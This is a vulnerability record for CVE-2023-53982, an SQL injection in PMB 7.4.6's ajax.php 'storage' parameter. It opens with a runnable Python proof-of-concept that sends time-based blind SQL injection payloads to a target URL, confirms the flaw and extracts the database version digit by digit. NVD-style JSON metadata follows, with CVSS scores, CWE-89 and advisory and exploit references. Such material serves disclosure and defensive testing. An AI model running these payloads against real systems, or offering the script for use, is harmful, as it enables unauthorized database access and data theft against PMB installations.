CVE-2023-53982

# CVE-2023-53982 PMB SQL Injection PoC import requests import time target_url = "http://target.com/ajax.php" def test_sqli(): """Test for SQL injection vulnerability""" # Basic time-based blind SQL injection test payload_true = "test' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--" payload_false = "test' AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END)--" params = { 'storage': payload_true, 'section': 'search', 'sub': 'result' } start_time = time.time() response = requests.get(target_url, params=params, timeout=10) elapsed_true = time.time() - start_time params['storage'] = payload_false start_time = time.time() response = requests.get(target_url, params=params, timeout=10) elapsed_false = time.time() - start_time if elapsed_true > 4.5 and elapsed_false < 1: print("[+] SQL Injection vulnerability confirmed!") return True return False def extract_data(): """Extract database version using time-based blind SQLi""" print("[*] Extracting database version...") for version in range(5, 10): payload = f"test' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='{version}') THEN SLEEP(5) ELSE 0 END)--" params = {'storage': payload, 'section': 'search', 'sub': 'result'} start_time = time.time() requests.get(target_url, params=params, timeout=10) elapsed = time.time() - start_time if elapsed > 4.5: print(f"[+] Database version starts with: {version}") break if __name__ == "__main__": print("[*] Testing CVE-2023-53982") if test_sqli(): extract_data()

{"cve": {"id": "CVE-2023-53982", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:46.073", "lastModified": "2026-01-16T19:16:14.480", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PMB 7.4.6 contains a SQL injection vulnerability in the storage parameter of the ajax.php endpoint that allows remote attackers to manipulate database queries. Attackers can exploit the unsanitized 'id' parameter by injecting conditional sleep statements to extract information or perform time-based blind SQL injection attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "7F6BCC12-4630-4A28-BF91-35DB0393B131"}]}]}], "references": [{"url": "http://forge.sigb.net/redmine/projects/pmb/files", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.sigb.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51197", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/pmb-sql-injection-vulnerability-via-unsanitized-storage-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}